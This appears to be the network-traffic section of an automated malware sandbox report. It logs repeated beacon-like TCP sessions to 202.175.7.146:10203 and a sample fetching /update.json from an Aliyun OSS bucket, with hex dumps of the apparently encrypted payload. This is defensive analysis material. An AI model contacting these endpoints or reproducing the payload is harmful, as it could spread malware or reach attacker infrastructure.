Dec 5, 2024 05:31:35.898528099 CET	49845	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:36.018093109 CET	10203	49845	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:36.018138885 CET	10203	49845	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:36.026842117 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:36.146547079 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:36.146752119 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:36.147176027 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:36.266797066 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:37.703942060 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:37.757323980 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:37.990601063 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:37.991496086 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:38.111358881 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:38.541589975 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:38.585443974 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:38.818344116 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:38.851950884 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:38.972325087 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.405621052 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.405780077 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.405832052 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.405877113 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.405963898 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.406074047 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.406089067 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.406120062 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.406135082 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.406204939 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.406219006 CET	49852	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.512305975 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.525933027 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.525964022 CET	10203	49852	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.632110119 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:39.632210970 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.632643938 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:39.752403975 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:41.170289040 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:41.210467100 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:41.451338053 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:41.455281019 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:41.575021029 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:41.996166945 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.038563013 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.277858019 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.278475046 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.398427010 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.821938992 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.822033882 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.822105885 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.822104931 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.822372913 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.822410107 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.822452068 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.822518110 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.822540998 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.822571993 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.823120117 CET	49862	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.931670904 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:42.942233086 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.942243099 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:42.942740917 CET	10203	49862	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:43.051506996 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:43.055258989 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:43.055566072 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:43.177058935 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:44.596138000 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:44.647949934 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:44.872667074 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:44.873610973 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:44.996979952 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:45.415683031 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:45.460474014 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:45.685156107 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:45.685869932 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:45.805902004 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.229935884 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.230113983 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.230165005 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.230174065 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.230346918 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.230384111 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.230421066 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.230489016 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.230526924 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.230550051 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.230578899 CET	49873	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.338565111 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.351639986 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.351650953 CET	10203	49873	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.458431005 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:46.458517075 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.477714062 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:46.597382069 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:48.019418001 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:48.070027113 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:48.306703091 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:48.307806969 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:48.427962065 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:48.860117912 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:48.913645029 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.148479939 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.149168015 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.268919945 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.703737020 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.703866005 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.703876972 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.703910112 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.704000950 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.704040051 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.704071045 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.704082966 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.704121113 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.707762957 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.711591959 CET	49879	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:49.827410936 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.831293106 CET	10203	49879	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:49.931723118 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:50.054044962 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:50.054131031 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:50.084713936 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:50.204431057 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:51.602926970 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:51.647960901 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:51.877716064 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:51.879160881 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:51.998954058 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:52.425525904 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:52.476121902 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:52.705794096 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:52.755379915 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:52.875106096 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.386439085 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.390244961 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.390263081 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.390273094 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.390284061 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.390295029 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.390300035 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.390333891 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.390363932 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.390472889 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.390503883 CET	49890	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.494652033 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.510113955 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.510133028 CET	10203	49890	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.614509106 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:53.614583969 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.615032911 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:53.734678030 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:55.161597967 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:55.210484028 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:55.438965082 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:55.446449041 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:55.566157103 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:55.991368055 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.038707018 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.266686916 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.267390013 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.387228966 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.820622921 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.820702076 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.820749044 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.820780993 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.821016073 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.821084023 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.821094990 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.821146011 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.821146011 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.821239948 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.821239948 CET	49897	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.932045937 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:56.941600084 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:56.941613913 CET	10203	49897	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:57.051881075 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:57.052005053 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:57.052366972 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:57.172022104 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:58.612778902 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:58.663623095 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:58.899168015 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:58.944856882 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:58.947935104 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:59.067743063 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:59.499847889 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:59.554454088 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:59.789329052 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:31:59.789984941 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:31:59.909811020 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.344559908 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.344671011 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.344681978 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.344727039 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.345010042 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.345057964 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.345062971 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.345073938 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.345113993 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.345397949 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.345426083 CET	49907	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.463332891 CET	49917	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.465008974 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.465029001 CET	10203	49907	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.583081961 CET	10203	49917	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:00.583158970 CET	49917	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.583518028 CET	49917	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:00.703205109 CET	10203	49917	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:02.143742085 CET	10203	49917	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:02.194844961 CET	49917	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:32:02.430327892 CET	10203	49917	202.175.7.146	192.168.2.4
Dec 5, 2024 05:32:02.476109982 CET	49917	10203	192.168.2.4	202.175.7.146

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 05:29:55.785387039 CET	55780	53	192.168.2.4	1.1.1.1
Dec 5, 2024 05:29:56.088558912 CET	53	55780	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 05:29:55.785387039 CET	192.168.2.4	1.1.1.1	0x7562	Standard query (0)	leganse.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 05:29:56.088558912 CET	1.1.1.1	192.168.2.4	0x7562	No error (0)	leganse.oss-cn-hangzhou.aliyuncs.com		118.31.219.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

leganse.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	118.31.219.225	443	6260	C:\Users\user\Desktop\31#U544a.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 04:29:58 UTC	86	OUT	GET /update.json HTTP/1.1 accept: / host: leganse.oss-cn-hangzhou.aliyuncs.com
2024-12-05 04:29:59 UTC	475	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 05 Dec 2024 04:29:58 GMT Content-Type: application/octet-stream Content-Length: 309273 Connection: close x-oss-request-id: 67512C461AFF65313386C0C5 Accept-Ranges: bytes ETag: "C0275DE5D58C059C24614E81F1FA9E7A" Last-Modified: Thu, 05 Dec 2024 03:14:16 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 1854888355319726081 x-oss-storage-class: Standard Content-MD5: wCdd5dWMBZwkYU6B8fqeeg== x-oss-server-time: 11
2024-12-05 04:29:59 UTC	3621	IN	Data Raw: 49 5e 67 48 bf 43 4a f8 6e f7 e1 e9 04 14 32 4b 4b cb e4 dd 5c 12 57 b7 35 d2 bc 02 15 2d 82 be 6d cd a1 6b a9 de 58 4d 5a 29 15 77 ad 0b f2 af 72 a2 6e 4d b7 59 86 75 68 2e 2e 89 3d 49 e1 51 5a ca 89 88 69 76 fb ef 75 9d 4d 38 b0 17 3d 85 a5 cc fb f6 ef a8 cc 9b 17 dd 39 8c 88 5f 4d 5c 48 7c 5f 1d 65 1c 0b 0f de 80 bd 7f 05 c0 49 a7 e7 83 ec b5 f1 3a 5f b8 96 e0 68 bc 49 c2 05 4c 8f cf 94 d5 d8 20 a4 a1 f5 c9 d2 40 c3 cd a3 a8 88 85 5d 35 aa 6d b6 17 61 a1 ab 8e 58 34 92 a2 70 5e a5 e4 83 19 60 f7 c9 a3 38 4a a0 b9 38 72 c1 25 97 db 56 cf 83 6c e9 84 89 80 cd 61 66 fd b0 65 4e 46 b4 41 79 16 01 e3 cf a8 3c 78 00 34 98 3e 87 e3 c7 b6 1a 4d 16 1e bf 65 e0 dd f5 4a 3c 1a cb d9 4b dc d8 9d 43 cd 8d 2c 0a 8f d6 b4 97 ba 22 0b 44 98 a0 08 94 56 03 ee 6c 6a e9 Data Ascii: I^gHCJn2KK\W5-mkXMZ)wrnMYuh..=IQZivuM8=9_M\H\|_eI:_hIL @]5maX4p^`8J8r%VlafeNFAy<x4>MeJ<KC,"DVlj
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: dc 72 df c6 1f 34 9b 76 e3 ee 1a 8d d5 2e ed 3d ed d3 95 83 43 81 ef 95 c1 d2 14 40 c1 c6 22 23 23 61 70 fd 19 bf 27 52 5a ed a4 b1 e3 cc 1e c9 79 2e b8 34 de d2 5a d5 b6 dd 6d 3f 89 f3 d5 aa 1c f2 05 6b 1d f1 52 4c 3c 28 fb bb be 9f dd 97 fe 3d 61 38 13 3a 0a 4e af e8 8f 1b ec bc c0 e1 9b 6c 78 87 12 72 33 70 71 71 a8 a5 ec c5 bf 43 61 3d f5 da ec 89 e9 b2 84 0e e1 47 b1 f5 3b 4b f7 35 f6 7c ab e9 a9 72 ac 5b 46 51 2e 59 fe f8 33 78 1c ba e2 8f e6 f0 b4 a2 67 b4 b6 87 fb 12 77 e0 bb 67 0d 4d 51 fd 0d 0a 21 77 3d e8 9e 8d 10 23 ef b6 57 5f 9b 69 d8 25 8d a5 30 c2 b8 de 22 74 a9 e5 f8 5c ba f5 3f d7 e1 48 02 e1 5e e9 52 f2 a4 65 7d 42 96 e6 38 c5 4c 73 a9 eb 88 b7 c9 8d 2b 8f ba 17 4e 2b d4 50 8a 3e c3 68 21 a6 e5 9a 4f 11 c2 af 86 3e b6 ae fc 22 56 c2 6a Data Ascii: r4v.=C@"##ap'RZy.4Zm?kRL<(=a8:Nlxr3pqqCa=G;K5\|r[FQ.Y3xgwgMQ!w=#W_i%0"t\?H^Re}B8Ls+N+P>h!O>"Vj
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 86 be e2 2f 7f 77 b7 a7 2b fa 81 df 9e 8e 10 ac 87 8e 0c f1 39 14 e1 67 b7 20 0f c6 72 ae 10 62 16 b5 96 e7 7c f2 90 68 77 d6 9d 41 c6 60 b5 38 e1 3e 0a 77 c1 e4 d0 0a 5a ed 10 ea 8d 8f 3b b0 4a 95 3d ad 0a fa cb 3f d6 bf 70 02 ab 52 6d fc 43 2d e8 f3 81 67 e2 49 8b 15 f4 20 95 55 30 91 4f 98 76 7f 7c be 34 2e 47 49 ed f7 62 77 6f 9a ba 04 83 44 4f 5b fd 2d 0c 5f e9 c7 29 0c a5 87 7d 06 b9 35 cf 66 b2 a7 88 25 b7 ec 65 86 7d 54 09 1c 2a 09 2e 54 19 2e 58 2e 73 e6 45 dc da b3 6e 44 14 1a 20 3c c0 69 05 01 7c fd 6c fe c5 21 25 ec c1 fc ac d7 39 e2 76 ad 66 e3 55 04 ee a3 a7 46 8d 91 0f 25 9d af 01 c8 3f b6 66 ae 28 61 f3 fa 92 3a 38 9a c7 11 bf 83 db 25 54 f8 f0 3e 62 6c 16 16 8c 83 a2 26 eb d8 d3 24 dd e7 f8 1f 04 8a ad b1 26 13 78 bd cc 81 51 50 e2 34 eb Data Ascii: /w+9g rb\|hwA`8>wZ;J=?pRmC-gI U0Ov\|4.GIbwoDO[-_)}5f%e}T*.T.X.sEnD <i\|l!%9vfUF%?f(a:8%T>bl&$&xQP4
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 5c 54 02 43 44 02 6c f9 25 70 d6 5f 7b 3f b8 6d fd 52 91 db 68 eb 74 0a 35 79 d0 0b 1a e6 73 4f 3b 61 b5 ba 65 3c dc d0 2b ad ed bb 36 f8 21 6d a2 57 de c8 b6 ce 35 82 82 79 b0 3d 26 57 9e 35 e4 90 c5 54 4a 30 f1 66 ec ed 20 a2 26 21 71 67 2c 3d cf 66 6e 4a aa d9 be 0e 35 fb 6e 3e d3 8a 15 43 8c 42 d9 0a 9b 5a 1a 31 ec 47 4d 8e cc 4b 6f ca 67 bf 66 21 30 9b f2 94 44 e8 b7 a6 b3 01 75 10 b5 cc 82 e2 b1 05 5c f5 02 05 59 15 2f fc e7 35 99 fd a2 b1 55 ea 67 81 1e c0 34 70 9c 29 f9 ea 79 af 73 67 8a 57 4c 8f 9e 9e 51 34 13 ec ba a9 2a 5a 5c e8 07 bf 84 14 15 bb bf 8c 67 9d b2 34 fc 76 a7 b5 df 69 3c 52 3e 8e 31 56 b9 54 d8 19 bf 8f a8 3c 01 5d ff f7 17 f6 f1 83 f2 f7 62 6c 85 83 78 69 23 14 02 35 b6 ca 7c c7 d7 3e 35 a5 8c 66 eb 42 e3 ee 1d aa 42 fc 9d b6 a3 Data Ascii: \TCDl%p_{?mRht5ysO;ae<+6!mW5y=&W5TJ0f &!qg,=fnJ5n>CBZ1GMKogf!0Du\Y/5Ug4p)ysgWLQ4*Z\g4vi<R>1VT<]blxi#5\|>5fBB
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: 20 9e 1f 7c 97 e2 f9 6d 26 25 11 32 96 e4 34 a9 e7 e0 f6 ba 36 2b 7d 0d 27 6a da 3d 6f 03 b8 6c b6 be 1a ca 6a 96 9b 4d f6 c0 44 cd 8e 7d 62 51 74 39 73 3e cd cb 7e 3b 2b 03 07 77 2a 88 0b 0f d3 ea 36 9c d8 fc 14 28 3a e7 37 63 5a 84 60 b0 6e fe 96 13 38 4c a6 49 81 6c d0 be ac f9 85 1e a3 35 8a d3 18 51 df d3 c8 c5 2f 8c 2b 9a fa 47 c8 8a 33 b6 60 21 c9 b6 85 0b e3 c6 a5 93 01 c2 cd 13 2d 0c aa 06 70 b2 a2 7f 23 69 9b 69 0e 05 a3 af 62 bd 1a 5a 34 cd d4 9f d3 42 cb 1c dd 4e 43 38 e2 98 f2 bf 8b 1b 02 49 d9 54 d2 10 a6 23 fd cd ca 58 1d f6 c8 bf 64 74 7f eb 8a 56 6a 63 b0 4a 9c b3 f9 dc 34 e4 db 07 e4 50 70 c8 e7 69 0c 17 9a b5 58 0c 61 af 4d 37 f9 e3 12 bc 0d 22 9f 4a 90 4d a5 f6 f8 2d 91 b0 3a dc c6 61 75 1e b1 a8 28 31 3a b0 46 57 78 4e 53 f4 cd bc 87 Data Ascii: \|m&%246+}'j=oljMD}bQt9s>~;+w*6(:7cZ`n8LIl5Q/+G3`!-p#iibZ4BNC8IT#XdtVjcJ4PpiXaM7"JM-:au(1:FWxNS
2024-12-05 04:29:59 UTC	4096	IN	Data Raw: a5 fd 0b a0 40 2e 06 9b 88 b8 3e 97 93 54 a5 18 b3 ff c8 d4 5c ac 21 d8 0b 42 6f 31 0e 69 06 b1 25 bf dd 74 e3 29 3d 76 39 df b6 78 54 c6 7c d7 a8 e1 6f 06 90 bb 3b 4a ea e9 a1 7b cc 65 d0 3b 81 1f 44 5d 07 26 31 d7 ab 3b be 0e 9c 01 3d a4 e2 c1 b3 be a5 46 c8 cd ca b1 50 c4 7e 45 59 ed d9 a2 df 61 d1 eb 7b 05 d3 32 5a 60 8b e9 d3 98 80 d0 b6 7f 5f 2c 93 26 5a 1f 1c 9e 9e 19 24 99 51 3f 39 e7 1e 46 13 3d 5e 5e 05 d5 54 65 5d bf 63 03 3d 6d a0 ae ec 30 19 6a 15 16 71 81 19 60 33 53 e0 89 46 d2 4d 9d 00 cb ec 62 f2 64 09 0d e9 e9 f4 a0 ab 14 78 2a 92 50 18 7c 95 50 64 2a c1 f5 3d dc d0 85 f9 c8 e1 8f d6 9d a4 3c de 87 c0 bb 29 4b c7 a3 e0 f2 fa 71 a4 82 93 e0 57 cc fd 25 23 30 8a 2f b3 09 c5 5e 88 07 3e 93 b2 81 9b 9c 3d bf 65 92 99 22 17 8a 24 43 78 5a 1b Data Ascii: @.>T\!Bo1i%t)=v9xT\|o;J{e;D]&1;=FP~EYa{2Z`_,&Z$Q?9F=^^Te]c=m0jq`3SFMbdxP\|Pd=<)KqW%#0/^>=e"$CxZ
